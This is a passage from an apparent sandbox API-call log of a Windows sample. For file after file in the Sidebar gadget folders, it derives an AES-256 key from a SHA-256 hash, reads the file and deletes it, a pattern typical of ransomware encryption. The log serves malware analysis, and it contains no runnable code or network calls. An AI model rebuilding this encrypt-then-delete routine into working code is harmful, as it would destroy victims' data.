CryptDestroyKey (hKey=0x284d568) returned 1 [0188.785] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.787] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\main.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\js\\main.js")) returned 0 [0188.884] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.884] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.884] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.884] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.884] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x71a8 [0188.884] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.888] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.888] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.888] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.889] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\js\\settings.js")) returned 0 [0188.890] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.890] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.890] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.890] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.890] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x294e [0188.890] ReadFile (in: hFile=0x598, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.893] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.893] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.893] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.894] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\main.html")) returned 0 [0188.895] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.895] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.895] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.895] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.896] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5862 [0188.896] ReadFile (in: hFile=0x5a0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.899] CryptDestroyHash (hHash=0x284d568) returned 1 [0188.899] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.899] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.900] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\settings.html")) returned 0 [0188.901] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.913] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.914] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.914] CryptHashData (hHash=0x284d668, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.914] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.914] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7a53 [0188.914] ReadFile (in: hFile=0x598, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.987] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.987] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.987] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.988] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png")) returned 0 [0188.988] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.989] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.990] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.990] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0188.991] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.991] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.991] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1172 [0188.991] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.996] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.996] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.996] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.997] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css")) returned 0 [0189.003] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0189.003] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0189.003] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.003] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0189.003] GetFileSize (in: hFile=0x5a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1454 [0189.003] ReadFile (in: hFile=0x5a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0189.006] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0189.006] CryptDestroyKey (hKey=0x284d528) returned 1 [0189.006] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.007] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\settings.css")) returned 0 [0189.011] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.011] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.011] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.011] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0189.011] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f2 [0189.011] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.020] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.020] CryptDestroyKey (hKey=0x284d668) returned 1 [0189.020] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.021] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml")) returned 0 [0189.021] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0189.022] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0189.022] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0189.022] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.022] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0189.022] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbaa2 [0189.022] ReadFile (in: hFile=0x598, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0189.083] CryptDestroyHash (hHash=0x284d668) returned 1 [0189.083] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0189.083] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.084] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js")) returned 0 [0189.088] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0189.089] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0189.089] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.089] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0189.089] GetFileSize (in: hFile=0x5a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x267e [0189.089] ReadFile (in: hFile=0x5a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0189.109] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0189.109] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0189.109] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.110] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\settings.js")) returned 0 [0189.111] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.111] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.111] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.111] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0189.111] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd6c [0189.111] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.114] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.114] CryptDestroyKey (hKey=0x284d668) returned 1 [0189.114] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.115] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html")) returned 0 [0189.115] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.116] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.116] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.116] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0189.116] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x156a [0189.116] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.129] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.129] CryptDestroyKey (hKey=0x284d668) returned 1 [0189.129] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.130] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html")) returned 0 [0189.131] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0189.132] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0189.132] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.132] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0189.132] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x255b [0189.132] ReadFile (in: hFile=0x5a0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0189.137] CryptDestroyHash (hHash=0x284d568) returned 1 [0189.137] CryptDestroyKey (hKey=0x284d528) returned 1 [0189.137] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.138] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png")) returned 0 [0189.139] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0189.140] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.141] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.141] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.141] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.141] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb22 [0189.141] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.143] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.143] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.143] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.144] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png")) returned 0 [0189.146] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.146] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.146] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.146] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.147] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5323 [0189.147] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.189] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.189] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.189] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.190] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png")) returned 0 [0189.191] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.191] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.191] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.191] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.191] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5e40 [0189.191] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.288] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.288] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.288] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.289] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png")) returned 0 [0189.290] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.291] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.291] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.291] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.291] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6936 [0189.291] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.305] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.305] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.305] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.307] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png")) returned 0 [0189.307] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.308] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.308] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.308] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.308] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7210 [0189.308] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.313] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.313] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.313] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.315] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png")) returned 0 [0189.316] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.317] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.317] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.317] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.317] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5f4d [0189.317] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.321] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.321] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.321] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.323] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png")) returned 0 [0189.326] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.326] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, 